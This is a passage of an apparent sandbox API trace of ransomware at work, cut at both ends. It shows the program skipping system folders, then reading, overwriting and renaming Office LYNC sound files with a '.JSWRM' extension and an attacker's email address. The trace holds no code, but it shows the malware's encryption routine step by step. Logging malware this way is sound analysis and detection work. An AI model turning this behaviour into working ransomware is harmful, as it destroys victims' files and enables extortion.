(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_fsringing.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_fsringing.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_fsringing.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_fsringing.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.199] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b03add6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b03add6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7fc8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_howler.wav", cAlternateFileName="LYNC_H~1.WAV")) returned 1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2=".") returned 1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="..") returned 1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="...") returned 1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="windows") returned -1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="recovery") returned -1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="perflogs") returned -1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="documents and settings") returned 1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="system volume information") returned -1 [0135.199] lstrcmpiW (lpString1="LYNC_howler.wav", lpString2="msocache") returned -1 [0135.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_howler.wav", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_howler.wav", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_howler.wav", lpUsedDefaultChar=0x0) returned 15 [0135.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_howler.wav", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_howler.wav", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_howler.wav", lpUsedDefaultChar=0x0) returned 15 [0135.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_howler.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_howler.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.200] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32712) returned 1 [0135.200] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.200] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7fc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7fc0, lpOverlapped=0x0) returned 1 [0135.204] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.204] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7fc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7fc0, lpOverlapped=0x0) returned 1 [0135.204] CloseHandle (hObject=0x238) returned 1 [0135.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_howler.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_howler.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_howler.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_howler.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.205] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0ad4d6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0ad4d6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0d373e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47c14, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_iminvite.wav", cAlternateFileName="LYNC_I~1.WAV")) returned 1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2=".") returned 1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="..") returned 1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="...") returned 1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="windows") returned -1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="recovery") returned -1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="perflogs") returned -1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="documents and settings") returned 1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="system volume information") returned -1 [0135.205] lstrcmpiW (lpString1="LYNC_iminvite.wav", lpString2="msocache") returned -1 [0135.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_iminvite.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_iminvite.wav", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_iminvite.wav", lpUsedDefaultChar=0x0) returned 17 [0135.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_iminvite.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_iminvite.wav", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_iminvite.wav", lpUsedDefaultChar=0x0) returned 17 [0135.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_iminvite.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_iminvite.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.207] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=293908) returned 1 [0135.207] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.207] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.219] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.219] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.220] CloseHandle (hObject=0x238) returned 1 [0135.220] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_iminvite.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_iminvite.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_iminvite.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_iminvite.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.221] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0ad4d6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0ad4d6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0d373e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83bc0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_joinedconference.wav", cAlternateFileName="LYNC_J~1.WAV")) returned 1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2=".") returned 1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="..") returned 1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="...") returned 1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="windows") returned -1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="recovery") returned -1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="perflogs") returned -1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="documents and settings") returned 1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="system volume information") returned -1 [0135.221] lstrcmpiW (lpString1="LYNC_joinedconference.wav", lpString2="msocache") returned -1 [0135.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_joinedconference.wav", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0135.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_joinedconference.wav", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_joinedconference.wav", lpUsedDefaultChar=0x0) returned 25 [0135.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_joinedconference.wav", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0135.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_joinedconference.wav", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_joinedconference.wav", lpUsedDefaultChar=0x0) returned 25 [0135.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_joinedconference.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_joinedconference.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.260] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=539584) returned 1 [0135.260] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.260] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.274] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.274] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.274] CloseHandle (hObject=0x238) returned 1 [0135.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_joinedconference.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_joinedconference.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_joinedconference.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_joinedconference.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.278] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b06103b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b06103b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0ad4d6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3586c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_muting.wav", cAlternateFileName="LYNC_M~1.WAV")) returned 1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2=".") returned 1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="..") returned 1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="...") returned 1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="windows") returned -1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="recovery") returned -1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="perflogs") returned -1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="documents and settings") returned 1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="system volume information") returned -1 [0135.278] lstrcmpiW (lpString1="LYNC_muting.wav", lpString2="msocache") returned -1 [0135.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_muting.wav", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_muting.wav", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_muting.wav", lpUsedDefaultChar=0x0) returned 15 [0135.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_muting.wav", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_muting.wav", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_muting.wav", lpUsedDefaultChar=0x0) returned 15 [0135.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_muting.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_muting.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.280] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=219244) returned 1 [0135.280] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.280] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.292] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.292] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.292] CloseHandle (hObject=0x238) returned 1 [0135.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_muting.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_muting.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_muting.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_muting.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.293] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0ad4d6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0ad4d6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0d373e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47c14, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_newim.wav", cAlternateFileName="LYNC_N~1.WAV")) returned 1 [0135.293] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2=".") returned 1 [0135.293] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="..") returned 1 [0135.293] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="...") returned 1 [0135.293] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="windows") returned -1 [0135.294] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="recovery") returned -1 [0135.294] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="perflogs") returned -1 [0135.294] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="documents and settings") returned 1 [0135.294] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.294] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="system volume information") returned -1 [0135.294] lstrcmpiW (lpString1="LYNC_newim.wav", lpString2="msocache") returned -1 [0135.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_newim.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_newim.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_newim.wav", lpUsedDefaultChar=0x0) returned 14 [0135.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_newim.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_newim.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_newim.wav", lpUsedDefaultChar=0x0) returned 14 [0135.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_newim.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_newim.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.295] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=293908) returned 1 [0135.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.295] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.313] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.313] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.314] CloseHandle (hObject=0x238) returned 1 [0135.314] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_newim.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_newim.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_newim.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_newim.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.316] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b08728d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b08728d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6bec, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_onhold.wav", cAlternateFileName="LYNC_O~1.WAV")) returned 1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2=".") returned 1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="..") returned 1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="...") returned 1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="windows") returned -1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="recovery") returned -1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="perflogs") returned -1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="documents and settings") returned 1 [0135.316] lstrcmpiW (lpString1="LYNC_onhold.wav", 